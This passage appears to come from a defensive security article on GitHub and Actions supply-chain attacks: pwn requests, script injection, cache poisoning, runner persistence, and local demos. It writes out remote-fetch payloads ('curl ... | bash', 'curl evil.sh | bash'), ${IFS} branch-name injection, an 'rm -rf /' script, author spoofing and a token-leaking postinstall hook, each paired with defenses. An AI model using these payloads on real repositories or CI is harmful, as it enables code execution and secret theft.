&lt;pre class="highlight plaintext"&gt;&lt;code&gt;openimbot:$({curl,-sSfL,raw.githubusercontent.com/.../file.sh}${IFS}|${IFS}bash)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Ultralytics's workflow inlined &lt;code&gt;${{ github.head_ref }}&lt;/code&gt; into a bash script, so the branch name was evaluated by the shell and pulled in a remote script. An XMRig Monero miner was injected into the PyPI release and ran on thousands of hosts.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5lwhi0lzup8xflr4fw4y.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5lwhi0lzup8xflr4fw4y.png" alt="Pwn request" width="800" height="330"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Defense:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Don't check out PR HEAD under &lt;code&gt;pull_request_target&lt;/code&gt;&lt;/strong&gt;. If you absolutely must, sandbox it explicitly.&lt;/li&gt;
&lt;li&gt;Run formatters / linters under &lt;code&gt;pull_request&lt;/code&gt; against base code only.&lt;/li&gt;
&lt;li&gt;Default external PRs to &lt;code&gt;permissions: read-all&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;If you really need &lt;code&gt;pull_request_target&lt;/code&gt;, gate it with &lt;strong&gt;an &lt;code&gt;if&lt;/code&gt; condition that limits to trusted users&lt;/strong&gt; first.&lt;/li&gt;
&lt;/ul&gt;
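&lt;p&gt;One possible shape for that gate, keyed on &lt;code&gt;author_association&lt;/code&gt; (the allow-list and the job body are illustrative, not a complete workflow):&lt;/p&gt;

```yaml
on: pull_request_target
jobs:
  labeler:
    # Run privileged steps only for PRs whose author is an owner or member;
    # everyone else should go through an unprivileged pull_request workflow.
    if: contains(fromJSON('["OWNER", "MEMBER"]'), github.event.pull_request.author_association)
    runs-on: ubuntu-latest
    steps:
      - run: echo "trusted author"
```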

&lt;h3&gt;
  
  
  3.3 Script Injection
&lt;/h3&gt;

&lt;p&gt;Adjacent to Pwn Request is shell injection via &lt;code&gt;${{ }}&lt;/code&gt;. GitHub Actions performs &lt;strong&gt;string substitution on &lt;code&gt;${{ ... }}&lt;/code&gt; before the shell runs&lt;/strong&gt;, so any shell metachar in a PR title or branch name turns into arbitrary code execution.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# vulnerable&lt;/span&gt;
&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;run&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
    &lt;span class="s"&gt;echo "PR title: ${{ github.event.pull_request.title }}"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;If the PR title is &lt;code&gt;"; curl evil.sh | bash; echo "&lt;/code&gt;, the resulting shell is:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"PR title: "&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; curl evil.sh | bash&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;""&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The same works on branch names. &lt;code&gt;zzz";echo${IFS}"hello";#&lt;/code&gt; is a &lt;strong&gt;valid branch name&lt;/strong&gt;, and &lt;code&gt;${IFS}&lt;/code&gt; expands to whitespace.&lt;/p&gt;
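&lt;p&gt;You can simulate the substitution locally with no runner at all. The key point is that &lt;code&gt;${{ }}&lt;/code&gt; is pasted into the script text before bash ever parses it:&lt;/p&gt;

```shell
# The "branch name" an attacker controls
BRANCH='zzz";echo${IFS}"hello";#'

# GitHub Actions substitutes the template as a raw string; bash sees the result
SCRIPT="git checkout \"$BRANCH\""
printf '%s\n' "$SCRIPT"        # the line bash will actually parse
bash -c "$SCRIPT" 2>/dev/null  # the injected echo runs and prints: hello
```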

&lt;p&gt;Defense:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Pass untrusted values &lt;strong&gt;via environment variables&lt;/strong&gt;:
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;env&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;PR_TITLE&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;${{ github.event.pull_request.title }}&lt;/span&gt;
  &lt;span class="na"&gt;run&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;echo "PR title&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="s"&gt;$PR_TITLE"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;Or &lt;strong&gt;don't expand &lt;code&gt;${{ }}&lt;/code&gt; directly into bash&lt;/strong&gt;. Use structured inputs like &lt;code&gt;actions/github-script&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Tools like &lt;code&gt;actionlint&lt;/code&gt; and GitHub Security Lab's CodeQL queries (plus community Semgrep rules) detect this pattern.&lt;/p&gt;

&lt;h3&gt;
  
  
  3.4 Cache Poisoning
&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;actions/cache&lt;/code&gt; saves and restores dependency caches to shorten build time. The problem is that &lt;strong&gt;cache scope is per repository&lt;/strong&gt;, and &lt;strong&gt;a cache written from main branch is readable by every branch and every workflow&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdlxct3ovya9g3s5incdp.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdlxct3ovya9g3s5incdp.png" alt="Cache Poisoning" width="800" height="314"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;In 2024 Adnan Khan published a PoC malware called &lt;strong&gt;Cacheract&lt;/strong&gt; that automates poisoning of GitHub Actions cache (&lt;code&gt;actions/cache&lt;/code&gt;). The cache is keyed per-repo and stores things like &lt;code&gt;node_modules/&lt;/code&gt;; another workflow run restores by the same key. Once Cacheract runs on main once, it writes itself back into the artifact and persists in the cache. Every subsequent workflow run picks up the malicious code on restore and re-infects automatically.&lt;/p&gt;

&lt;p&gt;In 2025 GitHub tightened cache eviction policy. The 2025-09-29 changelog announced a switch to &lt;strong&gt;hourly eviction&lt;/strong&gt;: when a repo passes the 10 GB cap, the oldest entries are evicted immediately (it used to be every 24 hours). Faster eviction makes it easier for an attacker to &lt;strong&gt;upload a large poisoned entry that evicts the legitimate cache, then drop in their own version&lt;/strong&gt;, all within a single workflow run. Note that the 2025-11-20 changelog moved in the opposite direction with "&lt;strong&gt;you can pay to exceed the 10 GB cap&lt;/strong&gt;", but in attack-surface terms the eviction speedup matters more.&lt;/p&gt;

&lt;p&gt;Adnan published a PoC where this technique came close to compromising &lt;strong&gt;Angular's dev infra&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Defense:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Strictly review pushes to main branch (this is the actual control).&lt;/li&gt;
&lt;li&gt;Include the commit SHA in the cache key.&lt;/li&gt;
&lt;li&gt;Guarantee build reproducibility with SLSA Provenance (the spec records which source / builder / inputs produced an artifact as a signed JSON. Inputs leaked in via cache will show up as a provenance mismatch).&lt;/li&gt;
&lt;/ul&gt;
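&lt;p&gt;The SHA-in-the-key idea, sketched against &lt;code&gt;actions/cache&lt;/code&gt; (the path and key prefix are placeholders):&lt;/p&gt;

```yaml
- uses: actions/cache@v4
  with:
    path: node_modules
    # Keying on the commit SHA makes each run write its own entry, so a
    # poisoned entry cannot be restored by later runs (at the cost of hit rate)
    key: deps-${{ runner.os }}-${{ github.sha }}
```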

&lt;h3&gt;
  
  
  3.5 Self-hosted runner backdoors
&lt;/h3&gt;

&lt;p&gt;GitHub Actions supports two kinds of runners: GitHub-managed and self-hosted. The latter runs on your own VM or server, with broader network access and privileges.&lt;/p&gt;

&lt;p&gt;If you use a self-hosted runner on &lt;strong&gt;a public repository&lt;/strong&gt;, an outside PR can execute code on the runner. This bites OSS projects fairly often. As one example, a 2022 Praetorian &lt;a href="https://www.praetorian.com/blog/self-hosted-github-runners-are-backdoors/" rel="noopener noreferrer"&gt;research post&lt;/a&gt; demonstrated against large OSS projects, including TensorFlow, that a malicious PR could plant a runner backdoor.&lt;/p&gt;

&lt;p&gt;The scary part is the &lt;strong&gt;persistence techniques&lt;/strong&gt;.&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;RUNNER_TRACKING_ID=0&lt;/code&gt;&lt;/strong&gt;: the runner kills processes with a matching tracking ID at job end. Rewrite it to &lt;code&gt;0&lt;/code&gt; and your process survives the cleanup.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Detached docker container&lt;/strong&gt;: a container started with &lt;code&gt;docker run -d&lt;/code&gt; keeps running after the job ends.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Non-ephemeral runner&lt;/strong&gt;: by default runners are not single-use. Once you plant something, it survives across runs.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fif2gh9f75vtuqrxkigk2.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fif2gh9f75vtuqrxkigk2.png" alt="self-hosted runner backdoors" width="797" height="586"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Sysdig published the details in January 2026. Because the runner only sends traffic to &lt;code&gt;github.com&lt;/code&gt;, network egress filters are nearly blind to it.&lt;/p&gt;

&lt;p&gt;Defense:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Don't use self-hosted runners on public repos&lt;/strong&gt; (this is the rule).&lt;/li&gt;
&lt;li&gt;Run &lt;strong&gt;ephemeral runners&lt;/strong&gt; (&lt;code&gt;--ephemeral&lt;/code&gt; flag, single-use per job).&lt;/li&gt;
&lt;li&gt;Run runners inside dedicated Kubernetes Pods (Actions Runner Controller).&lt;/li&gt;
&lt;li&gt;Default runner to &lt;code&gt;permissions: { contents: read }&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  Hands-on: attack demos you can reproduce locally
&lt;/h2&gt;

&lt;p&gt;Here are the parts that &lt;strong&gt;fit inside a local docker setup&lt;/strong&gt;, as a small set of scripts. Running them yourself gives you the "wait, it's actually this easy?" feeling.&lt;/p&gt;

&lt;h3&gt;
  
  
  Demo 1: tag rewrite
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Attacker: build a repo with two commits&lt;/span&gt;
&lt;span class="nb"&gt;mkdir &lt;/span&gt;attacker &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="nb"&gt;cd &lt;/span&gt;attacker
git init &lt;span class="nt"&gt;-b&lt;/span&gt; main
&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"# Trusted action"&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; README.md
git add &lt;span class="nb"&gt;.&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; git commit &lt;span class="nt"&gt;-m&lt;/span&gt; &lt;span class="s2"&gt;"Initial good commit"&lt;/span&gt;
git tag v1.0
&lt;span class="nv"&gt;GOOD_SHA&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;git rev-parse HEAD&lt;span class="si"&gt;)&lt;/span&gt;

&lt;span class="c"&gt;# Create a malicious commit and slap the same tag on it&lt;/span&gt;
&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"rm -rf /"&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; evil.sh
git add &lt;span class="nb"&gt;.&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; git commit &lt;span class="nt"&gt;-m&lt;/span&gt; &lt;span class="s2"&gt;"Innocent change"&lt;/span&gt;
git tag &lt;span class="nt"&gt;-f&lt;/span&gt; v1.0
&lt;span class="nv"&gt;EVIL_SHA&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;git rev-parse HEAD&lt;span class="si"&gt;)&lt;/span&gt;

git log &lt;span class="nt"&gt;--oneline&lt;/span&gt; &lt;span class="nt"&gt;--decorate&lt;/span&gt;
&lt;span class="c"&gt;# Confirm v1.0 now points at the evil commit&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Push to a remote with &lt;code&gt;git push --force --tags&lt;/code&gt;. On the GitHub UI the release list still says &lt;code&gt;v1.0&lt;/code&gt;, but &lt;strong&gt;the commit it points to has been swapped&lt;/strong&gt;.&lt;/p&gt;

&lt;h3&gt;
  
  
  Demo 2: commit author spoofing
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;mkdir &lt;/span&gt;spoof-demo &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="nb"&gt;cd &lt;/span&gt;spoof-demo
git init &lt;span class="nt"&gt;-b&lt;/span&gt; main

&lt;span class="c"&gt;# Commit as anyone you like&lt;/span&gt;
git &lt;span class="nt"&gt;-c&lt;/span&gt; user.name&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'Linus Torvalds'&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
    &lt;span class="nt"&gt;-c&lt;/span&gt; user.email&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'torvalds@linux-foundation.org'&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
    commit &lt;span class="nt"&gt;--allow-empty&lt;/span&gt; &lt;span class="nt"&gt;-m&lt;/span&gt; &lt;span class="s2"&gt;"Definitely from Linus"&lt;/span&gt;

git log &lt;span class="nt"&gt;--format&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'%an &amp;lt;%ae&amp;gt;'&lt;/span&gt;
&lt;span class="c"&gt;# Linus Torvalds &amp;lt;torvalds@linux-foundation.org&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Push this to GitHub and the UI shows Linus's actual avatar. There is no Verified badge, but it is hard to notice at a glance.&lt;/p&gt;

&lt;h3&gt;
  
  
  Demo 3: find a dangling commit
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;mkdir &lt;/span&gt;dangling-demo &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="nb"&gt;cd &lt;/span&gt;dangling-demo
git init &lt;span class="nt"&gt;-b&lt;/span&gt; main
&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"AWS_KEY=AKIA1234567890"&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; .env
git add &lt;span class="nb"&gt;.&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; git commit &lt;span class="nt"&gt;-m&lt;/span&gt; &lt;span class="s2"&gt;"oops with secret"&lt;/span&gt;
&lt;span class="nv"&gt;SECRET_SHA&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;git rev-parse HEAD&lt;span class="si"&gt;)&lt;/span&gt;

&lt;span class="c"&gt;# Rewrite to a commit without the secret&lt;/span&gt;
git &lt;span class="nb"&gt;rm&lt;/span&gt; .env
&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"# project"&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; README.md
git add &lt;span class="nb"&gt;.&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; git commit &lt;span class="nt"&gt;--amend&lt;/span&gt; &lt;span class="nt"&gt;--no-edit&lt;/span&gt;

&lt;span class="c"&gt;# The secret commit is no longer in log&lt;/span&gt;
git log &lt;span class="nt"&gt;--oneline&lt;/span&gt;

&lt;span class="c"&gt;# But it still lives in reflog and the object store&lt;/span&gt;
git cat-file &lt;span class="nt"&gt;-p&lt;/span&gt; &lt;span class="nv"&gt;$SECRET_SHA&lt;/span&gt;
&lt;span class="c"&gt;# author / message visible&lt;/span&gt;

&lt;span class="c"&gt;# fsck lists dangling objects&lt;/span&gt;
git fsck &lt;span class="nt"&gt;--lost-found&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Even after &lt;code&gt;git push --force&lt;/code&gt;, Truffle's Force Push Scanner can dig the commit back out of the remote object store.&lt;/p&gt;

&lt;h3&gt;
  
  
  Demo 4: minimal pull_request_target reproduction
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# vulnerable.yml&lt;/span&gt;
&lt;span class="na"&gt;on&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;pull_request_target&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;types&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="nv"&gt;opened&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;synchronize&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;
&lt;span class="na"&gt;jobs&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;run&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;runs-on&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ubuntu-latest&lt;/span&gt;
    &lt;span class="na"&gt;steps&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;uses&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;actions/checkout@v4&lt;/span&gt;
        &lt;span class="na"&gt;with&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
          &lt;span class="na"&gt;ref&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;${{ github.event.pull_request.head.ref }}&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;run&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;cat package.json | head&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;run&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;npm install&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Drop this into a test repo and &lt;strong&gt;open a PR from a fork&lt;/strong&gt;. Stick &lt;code&gt;"scripts": { "postinstall": "echo $GITHUB_TOKEN" }&lt;/code&gt; into the fork's &lt;code&gt;package.json&lt;/code&gt;, and the target repo's secrets leak into the job log (in testing, the token appears masked, so you can confirm the behavior without real damage).&lt;/p&gt;
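&lt;p&gt;For contrast, here is one safe counterpart; a hedged sketch rather than the only fix (gating on labels, or switching to the plain &lt;code&gt;pull_request&lt;/code&gt; trigger, are alternatives):&lt;/p&gt;

```yaml
# safe.yml -- one safe counterpart to vulnerable.yml (illustrative)
on:
  pull_request_target:
    types: [opened, synchronize]
jobs:
  run:
    runs-on: ubuntu-latest
    steps:
      # No `ref:` override: under pull_request_target this checks out the
      # trusted base branch, not the fork's head
      - uses: actions/checkout@v4
      - run: npm install --ignore-scripts  # and never run PR-supplied scripts
```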

&lt;p&gt;These four bundled into a single &lt;code&gt;run.sh&lt;/code&gt; would fit the existing hands-on style at &lt;code&gt;articles/assets/github-hacking-deep-dive/run.sh&lt;/code&gt;.&lt;/p&gt;




&lt;h2&gt;
  
  
  Defense matrix
&lt;/h2&gt;

&lt;p&gt;Finally, here is the attack-and-defense summary on a single page. &lt;strong&gt;No single control covers everything&lt;/strong&gt;: layer them.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Attack&lt;/th&gt;
&lt;th&gt;Primary defense&lt;/th&gt;
&lt;th&gt;Secondary defense&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Tag rewrite&lt;/td&gt;
&lt;td&gt;commit SHA pinning&lt;/td&gt;
&lt;td&gt;Sigstore / SLSA Provenance, Immutable Releases&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Author spoofing&lt;/td&gt;
&lt;td&gt;commit signing (&lt;code&gt;-S&lt;/code&gt;) + key registered on GitHub&lt;/td&gt;
&lt;td&gt;enable vigilant mode&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;SHA-1 collision&lt;/td&gt;
&lt;td&gt;GitHub.com collision detection&lt;/td&gt;
&lt;td&gt;migrate to a SHA-256 repo (long-term)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Submodule RCE&lt;/td&gt;
&lt;td&gt;upgrade to a patched git&lt;/td&gt;
&lt;td&gt;don't &lt;code&gt;--recursive&lt;/code&gt; clone repos you don't trust&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;RepoJacking&lt;/td&gt;
&lt;td&gt;pin dependencies to commit SHA&lt;/td&gt;
&lt;td&gt;dependency proxy / vendor&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;CFOR&lt;/td&gt;
&lt;td&gt;rotate assuming the secret has leaked&lt;/td&gt;
&lt;td&gt;secret scanning push protection&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Dangling commits&lt;/td&gt;
&lt;td&gt;run gitleaks / trufflehog before push&lt;/td&gt;
&lt;td&gt;bake rotation into your operational playbook&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Pwn Request&lt;/td&gt;
&lt;td&gt;don't check out PR HEAD under &lt;code&gt;pull_request_target&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;gate execution to trusted users&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Script Injection&lt;/td&gt;
&lt;td&gt;pass via environment variables&lt;/td&gt;
&lt;td&gt;actionlint / Semgrep in CI&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Cache Poisoning&lt;/td&gt;
&lt;td&gt;review pushes to main&lt;/td&gt;
&lt;td&gt;include commit SHA in cache key&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Self-hosted runner&lt;/td&gt;
&lt;td&gt;don't use them in public repos&lt;/td&gt;
&lt;td&gt;ephemeral runners&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The left column (primary) is &lt;strong&gt;what directly counters that attack vector&lt;/strong&gt;; the right column (secondary) is &lt;strong&gt;the fallback when the primary fails&lt;/strong&gt;. Sigstore / SLSA Provenance / Immutable Releases / gitsign recur across both columns, which is the giveaway that they pull multiple layers up at once.&lt;/p&gt;
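&lt;p&gt;One row is worth spelling out. The "pass via environment variables" defense against script injection, as a sketch (step name is illustrative):&lt;/p&gt;

```yaml
# Never interpolate untrusted event data directly into `run:`;
# the ${{ }} expression expands BEFORE the shell parses the line.
#
#   BAD:  run: echo "${{ github.event.pull_request.title }}"
#
# Bind it to an env var instead; the shell then sees an opaque string:
- name: use-pr-title
  env:
    PR_TITLE: ${{ github.event.pull_request.title }}
  run: echo "$PR_TITLE"
```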




&lt;h2&gt;
  
  
  Wrap-up
&lt;/h2&gt;

&lt;p&gt;Git was designed as a distributed VCS where "consensus is taken after the fact". GitHub stacked SaaS conveniences on top of that, and Actions glued a CI execution environment to secrets. Each layer is reasonable in isolation, but &lt;strong&gt;the trust boundaries do not line up&lt;/strong&gt;.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;The git protocol &lt;strong&gt;does not verify authors&lt;/strong&gt; (Layer 1.2)&lt;/li&gt;
&lt;li&gt;GitHub &lt;strong&gt;does not actually delete deleted repos&lt;/strong&gt; (Layer 2.2)&lt;/li&gt;
&lt;li&gt;Actions &lt;strong&gt;gives outside PRs access to secrets&lt;/strong&gt; (Layer 3.2)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;These three were designed by separate teams in separate contexts, but &lt;strong&gt;attackers chain across layers&lt;/strong&gt;. The fact that tj-actions and Trivy got burned twice in a year by the same playbook is not a coincidence; it is a symptom of how wide the seams between those trust boundaries are.&lt;/p&gt;

&lt;p&gt;Defenses also span layers. SHA pinning alone is not enough, and commit signing alone is not enough. Sigstore + SLSA Provenance + Immutable Releases + ephemeral runners. Only with all of those in place do you start to &lt;strong&gt;prevent the third instance of the same playbook&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Next time you read GitHub's official release notes, ask which trust gap each new feature fills. Immutable Releases addresses Layer 1.1, push protection addresses Layer 2.3, the stricter &lt;code&gt;permissions:&lt;/code&gt; defaults address Layer 3 in general. Conversely, every new feature opens new gaps (the 10 GB eviction change accelerated Cacheract, for example).&lt;/p&gt;

&lt;p&gt;Most of the toolkit for hacking git and GitHub fits in &lt;strong&gt;a few command-line one-liners&lt;/strong&gt;. Because attack is easy, defense has to be in layers.&lt;/p&gt;

&lt;h2&gt;
  
  
  References
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.wiz.io/blog/github-action-tj-actions-changed-files-supply-chain-attack-cve-2025-30066" rel="noopener noreferrer"&gt;GitHub Action tj-actions/changed-files supply chain attack | Wiz Blog&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://thehackernews.com/2026/03/trivy-security-scanner-github-actions.html" rel="noopener noreferrer"&gt;Trivy Security Scanner GitHub Actions Breached, 75 Tags Hijacked | The Hacker News&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.crowdstrike.com/en-us/blog/from-scanner-to-stealer-inside-the-trivy-action-supply-chain-compromise/" rel="noopener noreferrer"&gt;From Scanner to Stealer: Inside the trivy-action Supply Chain Compromise | CrowdStrike&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.gruntwork.io/blog/how-to-spoof-any-user-on-github-and-what-to-do-to-prevent-it" rel="noopener noreferrer"&gt;How to Spoof Any User on Github | Gruntwork&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://arxiv.org/html/2504.19215v1" rel="noopener noreferrer"&gt;On the Prevalence and Usage of Commit Signing on GitHub (2025)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.blog/news-insights/company-news/sha-1-collision-detection-on-github-com/" rel="noopener noreferrer"&gt;SHA-1 collision detection on GitHub.com&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://dgl.cx/2025/07/git-clone-submodule-cve-2025-48384" rel="noopener noreferrer"&gt;CVE-2025-48384: Breaking Git with a carriage return&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://kondukto.io/blog/git-scm-affected-by-cve-2024-32002" rel="noopener noreferrer"&gt;CVE-2024-32002 git submodule symlink RCE&lt;/a&gt;&lt;/li&gt;
